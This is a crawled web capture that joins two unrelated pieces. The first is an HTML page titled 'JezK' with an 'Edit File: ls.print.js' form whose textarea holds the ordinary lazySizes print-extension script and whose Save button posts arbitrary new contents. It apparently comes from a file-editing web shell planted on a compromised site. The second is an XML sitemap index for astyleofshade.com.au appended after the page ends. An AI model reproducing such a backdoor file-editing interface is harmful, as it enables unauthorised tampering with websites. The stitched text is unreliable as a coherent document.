
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>JezK</title>
<style>
    body {
        font-family: Arial, sans-serif;
        margin: 0;
        padding: 0;
    }
    #container {
        max-width: 800px;
        margin: 20px auto;
        padding: 20px;
        border: 1px solid #ccc;
        border-radius: 5px;
        background-color: #f9f9f9;
    }
    h1 {
        text-align: center;
        color: #333;
    }
    h2 {
        margin-top: 30px;
        color: #555;
    }
    ul {
        list-style-type: none;
        padding: 0;
    }
    li {
        margin-bottom: 10px;
    }
    a {
        text-decoration: none;
        color: #007bff;
    }
    a:hover {
        text-decoration: underline;
    }
    form {
        margin-top: 20px;
    }
    input[type="text"], input[type="file"], input[type="submit"] {
        margin-bottom: 10px;
    }
    hr {
        border: 0;
        height: 1px;
        background-color: #ccc;
        margin-top: 20px;
        margin-bottom: 20px;
    }
</style>
</head>
<body>
<div id="container">
    <h1>JezK</h1>
    <h2>Edit File: ls.print.js</h2><form method="post"><textarea name="file_content" rows="10" cols="50">/*
This lazySizes extension adds better support for print.
In case the user starts to print lazysizes will load all images.
*/
(function(window, factory) {
	var globalInstall = function(){
		factory(window.lazySizes);
		window.removeEventListener(&#039;lazyunveilread&#039;, globalInstall, true);
	};

	factory = factory.bind(null, window, window.document);

	if(typeof module == &#039;object&#039; &amp;&amp; module.exports){
		factory(require(&#039;lazysizes&#039;));
	} else if(window.lazySizes) {
		globalInstall();
	} else {
		window.addEventListener(&#039;lazyunveilread&#039;, globalInstall, true);
	}
}(window, function(window, document, lazySizes) {
	/*jshint eqnull:true */
	&#039;use strict&#039;;
	var config, elements, onprint, printMedia;
	// see also: http://tjvantoll.com/2012/06/15/detecting-print-requests-with-javascript/
	if(window.addEventListener){
		config = lazySizes &amp;&amp; lazySizes.cfg;
		elements = config.lazyClass || &#039;lazyload&#039;;
		onprint = function(){
			var i, len;
			if(typeof elements == &#039;string&#039;){
				elements = document.getElementsByClassName(elements);
			}

			if(lazySizes){
				for(i = 0, len = elements.length; i &lt; len; i++){
					lazySizes.loader.unveil(elements[i]);
				}
			}
		};

		addEventListener(&#039;beforeprint&#039;, onprint, false);

		if(!(&#039;onbeforeprint&#039; in window) &amp;&amp; window.matchMedia &amp;&amp; (printMedia = matchMedia(&#039;print&#039;)) &amp;&amp; printMedia.addListener){
			printMedia.addListener(function(){
				if(printMedia.matches){
					onprint();
				}
			});
		}
	}
}));
</textarea><br><input type="submit" value="Save"></form></div>
</body>
</html>

<?xml version="1.0" encoding="UTF-8"?><?xml-stylesheet type="text/xsl" href="//astyleofshade.com.au/main-sitemap.xsl"?>
<sitemapindex xmlns="http://www.sitemaps.org/schemas/sitemap/0.9">
	<sitemap>
		<loc>https://astyleofshade.com.au/post-sitemap.xml</loc>
		<lastmod>2026-09-12T02:12:46+00:00</lastmod>
	</sitemap>
	<sitemap>
		<loc>https://astyleofshade.com.au/page-sitemap.xml</loc>
		<lastmod>2026-09-11T01:03:07+00:00</lastmod>
	</sitemap>
</sitemapindex>
<!-- XML Sitemap generated by Rank Math SEO Plugin (c) Rank Math - rankmath.com -->